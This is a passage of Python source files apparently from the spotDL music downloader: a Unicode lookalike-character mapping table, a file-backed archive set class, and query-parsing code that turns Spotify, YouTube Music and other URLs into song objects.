""" # pylint: skip-file __all__ = [ "AMBIGUOUS_CHARACTERS", "BAD_CHARS", ] BAD_CHARS = [12441, 12442] + list(range(769, 880)) # Source: https://github.com/hediet/vscode-unicode-data/blob/main/out/ambiguous.json AMBIGUOUS_CHARACTERS = { "8232": 32, "8233": 32, "5760": 32, "8192": 32, "8193": 32, "8194": 32, "8195": 32, "8196": 32, "8197": 32, "8198": 32, "8200": 32, "8201": 32, "8202": 32, "8287": 32, "8199": 32, "8239": 32, "2042": 95, "65101": 95, "65102": 95, "65103": 95, "8208": 45, "8209": 45, "8210": 45, "65112": 45, "1748": 45, "8259": 45, "727": 45, "8722": 45, "10134": 45, "11450": 45, "1549": 44, "1643": 44, "8218": 44, "184": 44, "42233": 44, "894": 59, "2307": 58, "2691": 58, "1417": 58, "1795": 58, "1796": 58, "5868": 58, "65072": 58, "6147": 58, "6153": 58, "8282": 58, "1475": 58, "760": 58, "42889": 58, "8758": 58, "720": 58, "42237": 58, "451": 33, "11601": 33, "660": 63, "577": 63, "2429": 63, "5038": 63, "42731": 63, "119149": 46, "8228": 46, "1793": 46, "1794": 46, "42510": 46, "68176": 46, "1632": 46, "1776": 46, "42232": 46, "1373": 96, "65287": 96, "8219": 96, "8242": 96, "1370": 96, "1523": 96, "8175": 96, "65344": 96, "900": 96, "8189": 96, "8125": 96, "8127": 96, "8190": 96, "697": 96, "884": 96, "712": 96, "714": 96, "715": 96, "756": 96, "699": 96, "701": 96, "700": 96, "702": 96, "42892": 96, "1497": 96, "2036": 96, "2037": 96, "5194": 96, "5836": 96, "94033": 96, "94034": 96, "65339": 91, "10088": 40, "10098": 40, "12308": 40, "64830": 40, "65341": 93, "10089": 41, "10099": 41, "12309": 41, "64831": 41, "10100": 123, "119060": 123, "10101": 125, "65342": 94, "8270": 42, "1645": 42, "8727": 42, "66335": 42, "5941": 47, "8257": 47, "8725": 47, "8260": 47, "9585": 47, "10187": 47, "10744": 47, "119354": 47, "12755": 47, "12339": 47, "11462": 47, "20031": 47, "12035": 47, "65340": 92, "65128": 92, "8726": 92, "10189": 92, "10741": 92, "10745": 92, "119311": 92, "119355": 92, "12756": 92, "20022": 92, "12034": 92, "42872": 38, "708": 94, "710": 94, "5869": 43, "10133": 43, "66203": 43, "8249": 60, "10094": 60, "706": 60, "119350": 60, "5176": 60, "5810": 60, "5120": 61, "11840": 61, "12448": 61, "42239": 61, "8250": 62, "10095": 62, "707": 62, "119351": 62, "5171": 62, "94015": 62, "8275": 126, "732": 126, "8128": 126, "8764": 126, "65372": 124, "65293": 45, "120784": 50, "120794": 50, "120804": 50, "120814": 50, "120824": 50, "130034": 50, "42842": 50, "423": 50, "1000": 50, "42564": 50, "5311": 50, "42735": 50, "119302": 51, "120785": 51, "120795": 51, "120805": 51, "120815": 51, "120825": 51, "130035": 51, "42923": 51, "540": 51, "439": 51, "42858": 51, "11468": 51, "1248": 51, "94011": 51, "71882": 51, "120786": 52, "120796": 52, "120806": 52, "120816": 52, "120826": 52, "130036": 52, "5070": 52, "71855": 52, "120787": 53, "120797": 53, "120807": 53, "120817": 53, "120827": 53, "130037": 53, "444": 53, "71867": 53, "120788": 54, "120798": 54, "120808": 54, "120818": 54, "120828": 54, "130038": 54, "11474": 54, "5102": 54, "71893": 54, "119314": 55, "120789": 55, "120799": 55, "120809": 55, "120819": 55, "120829": 55, "130039": 55, "66770": 55, "71878": 55, "2819": 56, "2538": 56, "2666": 56, "125131": 56, "120790": 56, "120800": 56, "120810": 56, "120820": 56, "120830": 56, "130040": 56, "547": 56, "546": 56, "66330": 56, "2663": 57, "2920": 57, "2541": 57, "3437": 57, "120791": 57, "120801": 57, "120811": 57, "120821": 57, "120831": 57, "130041": 57, "42862": 57, "11466": 57, "71884": 57, "71852": 57, "71894": 57, "9082": 97, "65345": 97, "119834": 97, "119886": 97, "119938": 97, "119990": 97, "120042": 97, "120094": 97, "120146": 97, "120198": 97, "120250": 97, "120302": 97, "120354": 97, "120406": 97, "120458": 97, "593": 97, "945": 97, "120514": 97, "120572": 97, "120630": 97, "120688": 97, "120746": 97, "65313": 65, "119808": 65, "119860": 65, "119912": 65, "119964": 65, "120016": 65, "120068": 65, "120120": 65, "120172": 65, "120224": 65, "120276": 65, "120328": 65, "120380": 65, "120432": 65, "913": 65, "120488": 65, "120546": 65, "120604": 65, "120662": 65, "120720": 65, "5034": 65, "5573": 65, "42222": 65, "94016": 65, "66208": 65, "119835": 98, "119887": 98, "119939": 98, "119991": 98, "120043": 98, "120095": 98, "120147": 98, "120199": 98, "120251": 98, "120303": 98, "120355": 98, "120407": 98, "120459": 98, "388": 98, "5071": 98, "5234": 98, "5551": 98, "65314": 66, "8492": 66, "119809": 66, "119861": 66, "119913": 66, "120017": 66, "120069": 66, "120121": 66, "120173": 66, "120225": 66, "120277": 66, "120329": 66, "120381": 66, "120433": 66, "42932": 66, "914": 66, "120489": 66, "120547": 66, "120605": 66, "120663": 66, "120721": 66, "5108": 66, "5623": 66, "42192": 66, "66178": 66, "66209": 66, "66305": 66, "65347": 99, "8573": 99, "119836": 99, "119888": 99, "119940": 99, "119992": 99, "120044": 99, "120096": 99, "120148": 99, "120200": 99, "120252": 99, "120304": 99, "120356": 99, "120408": 99, "120460": 99, "7428": 99, "1010": 99, "11429": 99, "43951": 99, "66621": 99, "128844": 67, "71922": 67, "71913": 67, "65315": 67, "8557": 67, "8450": 67, "8493": 67, "119810": 67, "119862": 67, "119914": 67, "119966": 67, "120018": 67, "120174": 67, "120226": 67, "120278": 67, "120330": 67, "120382": 67, "120434": 67, "1017": 67, "11428": 67, "5087": 67, "42202": 67, "66210": 67, "66306": 67, "66581": 67, "66844": 67, "8574": 100, "8518": 100, "119837": 100, "119889": 100, "119941": 100, "119993": 100, "120045": 100, "120097": 100, "120149": 100, "120201": 100, "120253": 100, "120305": 100, "120357": 100, "120409": 100, "120461": 100, "1281": 100, "5095": 100, "5231": 100, "42194": 100, "8558": 68, "8517": 68, "119811": 68, "119863": 68, "119915": 68, "119967": 68, "120019": 68, "120071": 68, "120123": 68, "120175": 68, "120227": 68, "120279": 68, "120331": 68, "120383": 68, "120435": 68, "5024": 68, "5598": 68, "5610": 68, "42195": 68, "8494": 101, "65349": 101, "8495": 101, "8519": 101, "119838": 101, "119890": 101, "119942": 101, "120046": 101, "120098": 101, "120150": 101, "120202": 101, "120254": 101, "120306": 101, "120358": 101, "120410": 101, "120462": 101, "43826": 101, "1213": 101, "8959": 69, "65317": 69, "8496": 69, "119812": 69, "119864": 69, "119916": 69, "120020": 69, "120072": 69, "120124": 69, "120176": 69, "120228": 69, "120280": 69, "120332": 69, "120384": 69, "120436": 69, "917": 69, "120492": 69, "120550": 69, "120608": 69, "120666": 69, "120724": 69, "11577": 69, "5036": 69, "42224": 69, "71846": 69, "71854": 69, "66182": 69, "119839": 102, "119891": 102, "119943": 102, "119995": 102, "120047": 102, "120099": 102, "120151": 102, "120203": 102, "120255": 102, "120307": 102, "120359": 102, "120411": 102, "120463": 102, "43829": 102, "42905": 102, "383": 102, "7837": 102, "1412": 102, "119315": 70, "8497": 70, "119813": 70, "119865": 70, "119917": 70, "120021": 70, "120073": 70, "120125": 70, "120177": 70, "120229": 70, "120281": 70, "120333": 70, "120385": 70, "120437": 70, "42904": 70, "988": 70, "120778": 70, "5556": 70, "42205": 70, "71874": 70, "71842": 70, "66183": 70, "66213": 70, "66853": 70, "65351": 103, "8458": 103, "119840": 103, "119892": 103, "119944": 103, "120048": 103, "120100": 103, "120152": 103, "120204": 103, "120256": 103, "120308": 103, "120360": 103, "120412": 103, "120464": 103, "609": 103, "7555": 103, "397": 103, "1409": 103, "119814": 71, "119866": 71, "119918": 71, "119970": 71, "120022": 71, "120074": 71, "120126": 71, "120178": 71, "120230": 71, "120282": 71, "120334": 71, "120386": 71, "120438": 71, "1292": 71, "5056": 71, "5107": 71, "42198": 71, "65352": 104, "8462": 104, "119841": 104, "119945": 104, "119997": 104, "120049": 104, "120101": 104, "120153": 104, "120205": 104, "120257": 104, "120309": 104, "120361": 104, "120413": 104, "120465": 104, "1211": 104, "1392": 104, "5058": 104, "65320": 72, "8459": 72, "8460": 72, "8461": 72, "119815": 72, "119867": 72, "119919": 72, "120023": 72, "120179": 72, "120231": 72, "120283": 72, "120335": 72, "120387": 72, "120439": 72, "919": 72, "120494": 72, "120552": 72, "120610": 72, "120668": 72, "120726": 72, "11406": 72, "5051": 72, "5500": 72, "42215": 72, "66255": 72, "731": 105, "9075": 105, "65353": 105, "8560": 105, "8505": 105, "8520": 105, "119842": 105, "119894": 105, "119946": 105, "119998": 105, "120050": 105, "120102": 105, "120154": 105, "120206": 105, "120258": 105, "120310": 105, "120362": 105, "120414": 105, "120466": 105, "120484": 105, "618": 105, "617": 105, "953": 105, "8126": 105, "890": 105, "120522": 105, "120580": 105, "120638": 105, "120696": 105, "120754": 105, "1110": 105, "42567": 105, "1231": 105, "43893": 105, "5029": 105, "71875": 105, "65354": 106, "8521": 106, "119843": 106, "119895": 106, "119947": 106, "119999": 106, "120051": 106, "120103": 106, "120155": 106, "120207": 106, "120259": 106, "120311": 106, "120363": 106, "120415": 106, "120467": 106, "1011": 106, "1112": 106, "65322": 74, "119817": 74, "119869": 74, "119921": 74, "119973": 74, "120025": 74, "120077": 74, "120129": 74, "120181": 74, "120233": 74, "120285": 74, "120337": 74, "120389": 74, "120441": 74, "42930": 74, "895": 74, "1032": 74, "5035": 74, "5261": 74, "42201": 74, "119844": 107, "119896": 107, "119948": 107, "120000": 107, "120052": 107, "120104": 107, "120156": 107, "120208": 107, "120260": 107, "120312": 107, "120364": 107, "120416": 107, "120468": 107, "8490": 75, "65323": 75, "119818": 75, "119870": 75, "119922": 75, "119974": 75, "120026": 75, "120078": 75, "120130": 75, "120182": 75, "120234": 75, "120286": 75, "120338": 75, "120390": 75, "120442": 75, "922": 75, "120497": 75, "120555": 75, "120613": 75, "120671": 75, "120729": 75, "11412": 75, "5094": 75, "5845": 75, "42199": 75, "66840": 75, "1472": 108, "8739": 73, "9213": 73, "65512": 73, "1633": 108, "1777": 73, "66336": 108, "125127": 108, "120783": 73, "120793": 73, "120803": 73, "120813": 73, "120823": 73, "130033": 73, "65321": 73, "8544": 73, "8464": 73, "8465": 73, "119816": 73, "119868": 73, "119920": 73, "120024": 73, "120128": 73, "120180": 73, "120232": 73, "120284": 73, "120336": 73, "120388": 73, "120440": 73, "65356": 108, "8572": 73, "8467": 108, "119845": 108, "119897": 108, "119949": 108, "120001": 108, "120053": 108, "120105": 73, "120157": 73, "120209": 73, "120261": 73, "120313": 73, "120365": 73, "120417": 73, "120469": 73, "448": 73, "120496": 73, "120554": 73, "120612": 73, "120670": 73, "120728": 73, "11410": 73, "1030": 73, "1216": 73, "1493": 108, "1503": 108, "1575": 108, "126464": 108, "126592": 108, "65166": 108, "65165": 108, "1994": 108, "11599": 73, "5825": 73, "42226": 73, "93992": 73, "66186": 124, "66313": 124, "119338": 76, "8556": 76, "8466": 76, "119819": 76, "119871": 76, "119923": 76, "120027": 76, "120079": 76, "120131": 76, "120183": 76, "120235": 76, "120287": 76, "120339": 76, "120391": 76, "120443": 76, "11472": 76, "5086": 76, "5290": 76, "42209": 76, "93974": 76, "71843": 76, "71858": 76, "66587": 76, "66854": 76, "65325": 77, "8559": 77, "8499": 77, "119820": 77, "119872": 77, "119924": 77, "120028": 77, "120080": 77, "120132": 77, "120184": 77, "120236": 77, "120288": 77, "120340": 77, "120392": 77, "120444": 77, "924": 77, "120499": 77, "120557": 77, "120615": 77, "120673": 77, "120731": 77, "1018": 77, "11416": 77, "5047": 77, "5616": 77, "5846": 77, "42207": 77, "66224": 77, "66321": 77, "119847": 110, "119899": 110, "119951": 110, "120003": 110, "120055": 110, "120107": 110, "120159": 110, "120211": 110, "120263": 110, "120315": 110, "120367": 110, "120419": 110, "120471": 110, "1400": 110, "1404": 110, "65326": 78, "8469": 78, "119821": 78, "119873": 78, "119925": 78, "119977": 78, "120029": 78, "120081": 78, "120185": 78, "120237": 78, "120289": 78, "120341": 78, "120393": 78, "120445": 78, "925": 78, "120500": 78, "120558": 78, "120616": 78, "120674": 78, "120732": 78, "11418": 78, "42208": 78, "66835": 78, "3074": 111, "3202": 111, "3330": 111, "3458": 111, "2406": 111, "2662": 111, "2790": 111, "3046": 111, "3174": 111, "3302": 111, "3430": 111, "3664": 111, "3792": 111, "4160": 111, "1637": 111, "1781": 111, "65359": 111, "8500": 111, "119848": 111, "119900": 111, "119952": 111, "120056": 111, "120108": 111, "120160": 111, "120212": 111, "120264": 111, "120316": 111, "120368": 111, "120420": 111, "120472": 111, "7439": 111, "7441": 111, "43837": 111, "959": 111, "120528": 111, "120586": 111, "120644": 111, "120702": 111, "120760": 111, "963": 111, "120532": 111, "120590": 111, "120648": 111, "120706": 111, "120764": 111, "11423": 111, "4351": 111, "1413": 111, "1505": 111, "1607": 111, "126500": 111, "126564": 111, "126596": 111, "65259": 111, "65260": 111, "65258": 111, "65257": 111, "1726": 111, "64428": 111, "64429": 111, "64427": 111, "64426": 111, "1729": 111, "64424": 111, "64425": 111, "64423": 111, "64422": 111, "1749": 111, "3360": 111, "4125": 111, "66794": 111, "71880": 111, "71895": 111, "66604": 111, "1984": 79, "2534": 79, "2918": 79, "12295": 79, "70864": 79, "71904": 79, "120782": 79, "120792": 79, "120802": 79, "120812": 79, "120822": 79, "130032": 79, "65327": 79, "119822": 79, "119874": 79, "119926": 79, "119978": 79, "120030": 79, "120082": 79, "120134": 79, "120186": 79, "120238": 79, "120290": 79, "120342": 79, "120394": 79, "120446": 79, "927": 79, "120502": 79, "120560": 79, "120618": 79, "120676": 79, "120734": 79, "11422": 79, "1365": 79, "11604": 79, "4816": 79, "2848": 79, "66754": 79, "42227": 79, "71861": 79, "66194": 79, "66219": 79, "66564": 79, "66838": 79, "9076": 112, "65360": 112, "119849": 112, "119901": 112, "119953": 112, "120005": 112, "120057": 112, "120109": 112, "120161": 112, "120213": 112, "120265": 112, "120317": 112, "120369": 112, "120421": 112, "120473": 112, "961": 112, "120530": 112, "120544": 112, "120588": 112, "120602": 112, "120646": 112, "120660": 112, "120704": 112, "120718": 112, "120762": 112, "120776": 112, "11427": 112, "65328": 80, "8473": 80, "119823": 80, "119875": 80, "119927": 80, "119979": 80, "120031": 80, "120083": 80, "120187": 80, "120239": 80, "120291": 80, "120343": 80, "120395": 80, "120447": 80, "929": 80, "120504": 80, "120562": 80, "120620": 80, "120678": 80, "120736": 80, "11426": 80, "5090": 80, "5229": 80, "42193": 80, "66197": 80, "119850": 113, "119902": 113, "119954": 113, "120006": 113, "120058": 113, "120110": 113, "120162": 113, "120214": 113, "120266": 113, "120318": 113, "120370": 113, "120422": 113, "120474": 113, "1307": 113, "1379": 113, "1382": 113, "8474": 81, "119824": 81, "119876": 81, "119928": 81, "119980": 81, "120032": 81, "120084": 81, "120188": 81, "120240": 81, "120292": 81, "120344": 81, "120396": 81, "120448": 81, "11605": 81, "119851": 114, "119903": 114, "119955": 114, "120007": 114, "120059": 114, "120111": 114, "120163": 114, "120215": 114, "120267": 114, "120319": 114, "120371": 114, "120423": 114, "120475": 114, "43847": 114, "43848": 114, "7462": 114, "11397": 114, "43905": 114, "119318": 82, "8475": 82, "8476": 82, "8477": 82, "119825": 82, "119877": 82, "119929": 82, "120033": 82, "120189": 82, "120241": 82, "120293": 82, "120345": 82, "120397": 82, "120449": 82, "422": 82, "5025": 82, "5074": 82, "66740": 82, "5511": 82, "42211": 82, "94005": 82, "65363": 115, "119852": 115, "119904": 115, "119956": 115, "120008": 115, "120060": 115, "120112": 115, "120164": 115, "120216": 115, "120268": 115, "120320": 115, "120372": 115, "120424": 115, "120476": 115, "42801": 115, "445": 115, "1109": 115, "43946": 115, "71873": 115, "66632": 115, "65331": 83, "119826": 83, "119878": 83, "119930": 83, "119982": 83, "120034": 83, "120086": 83, "120138": 83, "120190": 83, "120242": 83, "120294": 83, "120346": 83, "120398": 83, "120450": 83, "1029": 83, "1359": 83, "5077": 83, "5082": 83, "42210": 83, "94010": 83, "66198": 83, "66592": 83, "119853": 116, "119905": 116, "119957": 116, "120009": 116, "120061": 116, "120113": 116, "120165": 116, "120217": 116, "120269": 116, "120321": 116, "120373": 116, "120425": 116, "120477": 116, "8868": 84, "10201": 84, "128872": 84, "65332": 84, "119827": 84, "119879": 84, "119931": 84, "119983": 84, "120035": 84, "120087": 84, "120139": 84, "120191": 84, "120243": 84, "120295": 84, "120347": 84, "120399": 84, "120451": 84, "932": 84, "120507": 84, "120565": 84, "120623": 84, "120681": 84, "120739": 84, "11430": 84, "5026": 84, "42196": 84, "93962": 84, "71868": 84, "66199": 84, "66225": 84, "66325": 84, "119854": 117, "119906": 117, "119958": 117, "120010": 117, "120062": 117, "120114": 117, "120166": 117, "120218": 117, "120270": 117, "120322": 117, "120374": 117, "120426": 117, "120478": 117, "42911": 117, "7452": 117, "43854": 117, "43858": 117, "651": 117, "965": 117, "120534": 117, "120592": 117, "120650": 117, "120708": 117, "120766": 117, "1405": 117, "66806": 117, "71896": 117, "8746": 85, "8899": 85, "119828": 85, "119880": 85, "119932": 85, "119984": 85, "120036": 85, "120088": 85, "120140": 85, "120192": 85, "120244": 85, "120296": 85, "120348": 85, "120400": 85, "120452": 85, "1357": 85, "4608": 85, "66766": 85, "5196": 85, "42228": 85, "94018": 85, "71864": 85, "8744": 118, "8897": 118, "65366": 118, "8564": 118, "119855": 118, "119907": 118, "119959": 118, "120011": 118, "120063": 118, "120115": 118, "120167": 118, "120219": 118, "120271": 118, "120323": 118, "120375": 118, "120427": 118, "120479": 118, "7456": 118, "957": 118, "120526": 118, "120584": 118, "120642": 118, "120700": 118, "120758": 118, "1141": 118, "1496": 118, "71430": 118, "43945": 118, "71872": 118, "119309": 86, "1639": 86, "1783": 86, "8548": 86, "119829": 86, "119881": 86, "119933": 86, "119985": 86, "120037": 86, "120089": 86, "120141": 86, "120193": 86, "120245": 86, "120297": 86, "120349": 86, "120401": 86, "120453": 86, "1140": 86, "11576": 86, "5081": 86, "5167": 86, "42719": 86, "42214": 86, "93960": 86, "71840": 86, "66845": 86, "623": 119, "119856": 119, "119908": 119, "119960": 119, "120012": 119, "120064": 119, "120116": 119, "120168": 119, "120220": 119, "120272": 119, "120324": 119, "120376": 119, "120428": 119, "120480": 119, "7457": 119, "1121": 119, "1309": 119, "1377": 119, "71434": 119, "71438": 119, "71439": 119, "43907": 119, "71919": 87, "71910": 87, "119830": 87, "119882": 87, "119934": 87, "119986": 87, "120038": 87, "120090": 87, "120142": 87, "120194": 87, "120246": 87, "120298": 87, "120350": 87, "120402": 87, "120454": 87, "1308": 87, "5043": 87, "5076": 87, "42218": 87, "5742": 120, "10539": 120, "10540": 120, "10799": 120, "65368": 120, "8569": 120, "119857": 120, "119909": 120, "119961": 120, "120013": 120, "120065": 120, "120117": 120, "120169": 120, "120221": 120, "120273": 120, "120325": 120, "120377": 120, "120429": 120, "120481": 120, "5441": 120, "5501": 120, "5741": 88, "9587": 88, "66338": 88, "71916": 88, "65336": 88, "8553": 88, "119831": 88, "119883": 88, "119935": 88, "119987": 88, "120039": 88, "120091": 88, "120143": 88, "120195": 88, "120247": 88, "120299": 88, "120351": 88, "120403": 88, "120455": 88, "42931": 88, "935": 88, "120510": 88, "120568": 88, "120626": 88, "120684": 88, "120742": 88, "11436": 88, "11613": 88, "5815": 88, "42219": 88, "66192": 88, "66228": 88, "66327": 88, "66855": 88, "611": 121, "7564": 121, "65369": 121, "119858": 121, "119910": 121, "119962": 121, "120014": 121, "120066": 121, "120118": 121, "120170": 121, "120222": 121, "120274": 121, "120326": 121, "120378": 121, "120430": 121, "120482": 121, "655": 121, "7935": 121, "43866": 121, "947": 121, "8509": 121, "120516": 121, "120574": 121, "120632": 121, "120690": 121, "120748": 121, "1199": 121, "4327": 121, "71900": 121, "65337": 89, "119832": 89, "119884": 89, "119936": 89, "119988": 89, "120040": 89, "120092": 89, "120144": 89, "120196": 89, "120248": 89, "120300": 89, "120352": 89, "120404": 89, "120456": 89, "933": 89, "978": 89, "120508": 89, "120566": 89, "120624": 89, "120682": 89, "120740": 89, "11432": 89, "1198": 89, "5033": 89, "5053": 89, "42220": 89, "94019": 89, "71844": 89, "66226": 89, "119859": 122, "119911": 122, "119963": 122, "120015": 122, "120067": 122, "120119": 122, "120171": 122, "120223": 122, "120275": 122, "120327": 122, "120379": 122, "120431": 122, "120483": 122, "7458": 122, "43923": 122, "71876": 122, "66293": 90, "71909": 90, "65338": 90, "8484": 90, "8488": 90, "119833": 90, "119885": 90, "119937": 90, "119989": 90, "120041": 90, "120197": 90, "120249": 90, "120301": 90, "120353": 90, "120405": 90, "120457": 90, "918": 90, "120493": 90, "120551": 90, "120609": 90, "120667": 90, "120725": 90, "5059": 90, "42204": 90, "71849": 90, "65282": 34, "65284": 36, "65285": 37, "65286": 38, "65290": 42, "65291": 43, "65294": 46, "65295": 47, "65296": 48, "65297": 49, "65298": 50, "65299": 51, "65300": 52, "65301": 53, "65302": 54, "65303": 55, "65304": 56, "65305": 57, "65308": 60, "65309": 61, "65310": 62, "65312": 64, "65316": 68, "65318": 70, "65319": 71, "65324": 76, "65329": 81, "65330": 82, "65333": 85, "65334": 86, "65335": 87, "65343": 95, "65346": 98, "65348": 100, "65350": 102, "65355": 107, "65357": 109, "65358": 110, "65361": 113, "65362": 114, "65364": 116, "65365": 117, "65367": 119, "65370": 122, "65371": 123, "65373": 125, "160": 32, "8211": 45, "65374": 126, "65306": 58, "65281": 33, "8216": 96, "8217": 96, "8245": 96, "180": 96, "12494": 47, "1047": 51, "1073": 54, "1072": 97, "1040": 65, "1068": 98, "1042": 66, "1089": 99, "1057": 67, "1077": 101, "1045": 69, "1053": 72, "305": 105, "1050": 75, "921": 73, "1052": 77, "1086": 111, "1054": 79, "1009": 112, "1088": 112, "1056": 80, "1075": 114, "1058": 84, "215": 120, "1093": 120, "1061": 88, "1091": 121, "1059": 89, "65283": 35, "65288": 40, "65289": 41, "65292": 44, "65307": 59, "65311": 63, } File: spotdl/utils/archive.py """ Module for archiving sets of data """ from pathlib import Path from typing import Set __all__ = ["Archive"] class Archive(Set): """ Archive class. A file-persistable set. """ def load(self, file: str) -> bool: """ Imports the archive from the file. ### Arguments - file: the file name of the archive ### Returns - if the file exists """ if not Path(file).exists(): return False with open(file, "r", encoding="utf-8") as archive: self.clear() self.update([line.strip() for line in archive]) return True def save(self, file: str) -> bool: """ Exports the current archive to the file. ### Arguments - file: the file name of the archive """ with open(file, "w", encoding="utf-8") as archive: for element in sorted(self): archive.write(f"{element}\n") return True File: spotdl/utils/search.py """ Module for creating Song objects by interacting with Spotify API or by parsing a query. To use this module you must first initialize the SpotifyClient. """ import concurrent.futures import json import logging import re from pathlib import Path from typing import Dict, List, Optional import requests from ytmusicapi import YTMusic from spotdl.types.album import Album from spotdl.types.artist import Artist from spotdl.types.playlist import Playlist from spotdl.types.saved import Saved from spotdl.types.song import Song, SongList from spotdl.utils.metadata import get_file_metadata from spotdl.utils.spotify import SpotifyClient, SpotifyError __all__ = [ "QueryError", "get_search_results", "parse_query", "get_simple_songs", "reinit_song", "get_song_from_file_metadata", "gather_known_songs", "create_ytm_album", "create_ytm_playlist", "get_all_user_playlists", "get_user_saved_albums", ] logger = logging.getLogger(__name__) client = None # pylint: disable=invalid-name def get_ytm_client() -> YTMusic: """ Lazily initialize the YTMusic client. ### Returns - the YTMusic client """ global client # pylint: disable=global-statement if client is None: client = YTMusic() return client class QueryError(Exception): """ Base class for all exceptions related to query. """ def get_search_results(search_term: str) -> List[Song]: """ Creates a list of Song objects from a search term. ### Arguments - search_term: the search term to use ### Returns - a list of Song objects """ return Song.list_from_search_term(search_term) def parse_query( query: List[str], threads: int = 1, use_ytm_data: bool = False, playlist_numbering: bool = False, album_type=None, ) -> List[Song]: """ Parse query and return list containing song object ### Arguments - query: List of strings containing query - threads: Number of threads to use ### Returns - List of song objects """ songs: List[Song] = get_simple_songs( query, use_ytm_data=use_ytm_data, playlist_numbering=playlist_numbering, album_type=album_type, ) results = [] with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor: future_to_song = {executor.submit(reinit_song, song): song for song in songs} for future in concurrent.futures.as_completed(future_to_song): song = future_to_song[future] try: results.append(future.result()) except Exception as exc: logger.error("%s generated an exception: %s", song.display_name, exc) return results def get_simple_songs( query: List[str], use_ytm_data: bool = False, playlist_numbering: bool = False, albums_to_ignore=None, album_type=None, ) -> List[Song]: """ Parse query and return list containing simple song objects ### Arguments - query: List of strings containing query ### Returns - List of simple song objects """ songs: List[Song] = [] lists: List[SongList] = [] for request in query: logger.info("Processing query: %s", request) # Remove /intl-xxx/ from Spotify URLs with regex request = re.sub(r"\/intl-\w+\/", "/", request) if ( ( # pylint: disable=too-many-boolean-expressions "watch?v=" in request or "youtu.be/" in request or "soundcloud.com/" in request or "bandcamp.com/" in request ) and "open.spotify.com" in request and "track" in request and "|" in request ): split_urls = request.split("|") if ( len(split_urls) <= 1 or not ( "watch?v=" in split_urls[0] or "youtu.be" in split_urls[0] or "soundcloud.com/" in split_urls[0] or "bandcamp.com/" in split_urls[0] ) or "spotify" not in split_urls[1] ): raise QueryError( 'Incorrect format used, please use "YouTubeURL|SpotifyURL"' ) songs.append( Song.from_missing_data(url=split_urls[1], download_url=split_urls[0]) ) elif "music.youtube.com/watch?v" in request: track_data = get_ytm_client().get_song(request.split("?v=", 1)[1]) yt_song = Song.from_search_term( f"{track_data['videoDetails']['author']} - {track_data['videoDetails']['title']}" ) if use_ytm_data: yt_song.name = track_data["title"] yt_song.artist = track_data["author"] yt_song.artists = [track_data["author"]] yt_song.duration = track_data["lengthSeconds"] yt_song.download_url = request songs.append(yt_song) elif ( "youtube.com/playlist?list=" in request or "youtube.com/browse/VLPL" in request ): request = request.replace( "https://www.youtube.com/", "https://music.youtube.com/" ) request = request.replace( "https://youtube.com/", "https://music.youtube.com/" ) split_urls = request.split("|") if len(split_urls) == 1: if "?list=OLAK5uy_" in request: lists.append(create_ytm_album(request, fetch_songs=False)) elif "?list=PL" in request or "browse/VLPL" in request: lists.append(create_ytm_playlist(request, fetch_songs=False)) else: if ("spotify" not in split_urls[1]) or not any( x in split_urls[0] for x in ["?list=PL", "?list=OLAK5uy_", "browse/VLPL"] ): raise QueryError( 'Incorrect format used, please use "YouTubeMusicURL|SpotifyURL". ' "Currently only supports YouTube Music playlists and albums." ) if ("open.spotify.com" in request and "album" in request) and ( "?list=OLAK5uy_" in request ): ytm_list: SongList = create_ytm_album( split_urls[0], fetch_songs=False ) spot_list = Album.from_url(split_urls[1], fetch_songs=False) elif ("open.spotify.com" in request and "playlist" in request) and ( "?list=PL" in request or "browse/VLPL" in request ): ytm_list = create_ytm_playlist(split_urls[0], fetch_songs=False) spot_list = Playlist.from_url(split_urls[1], fetch_songs=False) else: raise QueryError( f"URLs are not of the same type, {split_urls[0]} is not " f"the same type as {split_urls[1]}." ) if ytm_list.length != spot_list.length: raise QueryError( f"The YouTube Music ({ytm_list.length}) " f"and Spotify ({spot_list.length}) lists have different lengths. " ) if use_ytm_data: for index, song in enumerate(ytm_list.songs): song.url = spot_list.songs[index].url lists.append(ytm_list) else: for index, song in enumerate(spot_list.songs): song.download_url = ytm_list.songs[index].download_url lists.append(spot_list) elif "open.spotify.com" in request and "track" in request: songs.append(Song.from_url(url=request)) elif "https://spotify.link/" in request: resp = requests.head(request, allow_redirects=True, timeout=10) full_url = resp.url full_lists = get_simple_songs( [full_url], use_ytm_data=use_ytm_data, playlist_numbering=playlist_numbering, album_type=album_type, ) songs.extend(full_lists) elif "open.spotify.com" in request and "playlist" in request: lists.append(Playlist.from_url(request, fetch_songs=False)) elif "open.spotify.com" in request and "album" in request: lists.append(Album.from_url(request, fetch_songs=False)) elif "open.spotify.com" in request and "artist" in request: lists.append(Artist.from_url(request, fetch_songs=False)) elif "open.spotify.com" in request and "user" in request: lists.extend(get_all_user_playlists(request)) elif "album:" in request: lists.append(Album.from_search_term(request, fetch_songs=False)) elif "playlist:" in request: lists.append(Playlist.from_search_term(request, fetch_songs=False)) elif "artist:" in request: lists.append(Artist.from_search_term(request, fetch_songs=False)) elif request == "saved": lists.append(Saved.from_url(request, fetch_songs=False)) elif request == "all-user-playlists": lists.extend(get_all_user_playlists()) elif request == "all-user-followed-artists": lists.extend(get_user_followed_artists()) elif request == "all-user-saved-albums": lists.extend(get_user_saved_albums()) elif request == "all-saved-playlists": lists.extend(get_all_saved_playlists()) elif request.endswith(".spotdl"): with open(request, "r", encoding="utf-8") as save_file: for track in json.load(save_file): # Append to songs songs.append(Song.from_dict(track)) else: songs.append(Song.from_search_term(request)) for song_list in lists: logger.info( "Found %s songs in %s (%s)", len(song_list.urls), song_list.name, song_list.__class__.__name__, ) for index, song in enumerate(song_list.songs): song_data = song.json song_data["list_name"] = song_list.name song_data["list_url"] = song_list.url song_data["list_position"] = song.list_position song_data["list_length"] = song_list.length if playlist_numbering: song_data["track_number"] = song_data["list_position"] song_data["tracks_count"] = song_data["list_length"] song_data["album_name"] = song_data["list_name"] song_data["disc_number"] = 1 song_data["disc_count"] = 1 if isinstance(song_list, Playlist): song_data["album_artist"] = song_list.author_name song_data["cover_url"] = song_list.cover_url songs.append(Song.from_dict(song_data)) # removing songs for --ignore-albums original_length = len(songs) if albums_to_ignore: songs = [ song for song in songs if all( keyword not in song.album_name.lower() for keyword in albums_to_ignore ) ] logger.info("Skipped %s songs (Ignored albums)", (original_length - len(songs))) if album_type: songs = [song for song in songs if song.album_type == album_type] logger.info( "Skipped %s songs for Album Type %s", (original_length - len(songs)), album_type, ) logger.debug("Found %s songs in %s lists", len(songs), len(lists)) return songs def songs_from_albums(albums: 